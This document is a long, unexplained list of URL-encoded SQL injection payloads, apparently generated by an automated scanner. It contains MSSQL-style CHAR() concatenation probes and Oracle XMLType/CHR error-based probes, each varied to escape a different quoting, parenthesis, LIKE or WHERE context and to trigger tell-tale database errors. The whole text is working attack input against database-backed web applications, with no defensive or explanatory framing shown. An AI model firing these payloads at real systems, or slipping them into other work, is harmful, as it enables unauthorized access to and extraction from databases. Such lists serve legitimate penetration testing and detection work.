1%27%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27Dpwy%27%3D%27Dpwy 1%27%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27fxTj%27%20LIKE%20%27fxTj 1%27%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27hEnp%27%20LIKE%20%27hEnp 1%27%29%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27EvSP%27%20LIKE%20%27EvSP 1%27%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27ohZf%27%20LIKE%20%27ohZf 1%22%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22zkvX%22%3D%22zkvX 1%22%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22TirC%22%3D%22TirC 1%22%29%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22IvSF%22%3D%22IvSF 1%22%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22dfgn%22%3D%22dfgn 1%22%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22zrmT%22%20LIKE%20%22zrmT 1%22%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22hrhV%22%20LIKE%20%22hrhV 1%22%29%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22VjzI%22%20LIKE%20%22VjzI 1%22%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22yYam%22%20LIKE%20%22yYam 1%25%27%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27SbBF%27%3D%27SbBF 1%00%27%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27ANEs%27%3D%27ANEs 1%27%29%20WHERE%209440%3D9440%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%22%29%20WHERE%205959%3D5959%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%27%20WHERE%204495%3D4495%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%22%20WHERE%207636%3D7636%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 1%27%7C%7C%28SELECT%20%27DaCZ%27%20FROM%20DUAL%20WHERE%205943%3D5943%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27ILSm%27%20WHERE%205361%3D5361%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%7C%7C%27 1%27%2B%28SELECT%20VCmU%20WHERE%209526%3D9526%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27jaJL%27%20WHERE%209643%3D9643%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%204596%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%284596%3D4596%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20%23 1%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%284706%3D4706 1%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%289885%3D9885 1%29%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%284529%3D4529 1%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%29%20WHERE%205490%3D5490%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1%20WHERE%207228%3D7228%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 1%27%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%27%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%22%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 1%27%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27JJEj%27%3D%27JJEj 1%27%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27avxL%27%3D%27avxL 1%27%29%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27PLEp%27%3D%27PLEp 1%27%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27HnSs%27%3D%27HnSs 1%27%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27GNEV%27%20LIKE%20%27GNEV 1%27%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27LhDh%27%20LIKE%20%27LhDh 1%27%29%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27MiBM%27%20LIKE%20%27MiBM 1%27%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27ASQd%27%20LIKE%20%27ASQd 1%22%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22MoDQ%22%3D%22MoDQ 1%22%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22axeM%22%3D%22axeM 1%22%29%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22CqJk%22%3D%22CqJk 1%22%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22boKc%22%3D%22boKc 1%22%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22eFtb%22%20LIKE%20%22eFtb 1%22%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22baZx%22%20LIKE%20%22baZx 1%22%29%29%29%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22vyPP%22%20LIKE%20%22vyPP 1%22%20AND%205293%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285293%3D5293%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22rYrl%22%20LIKE%20%22rYrl 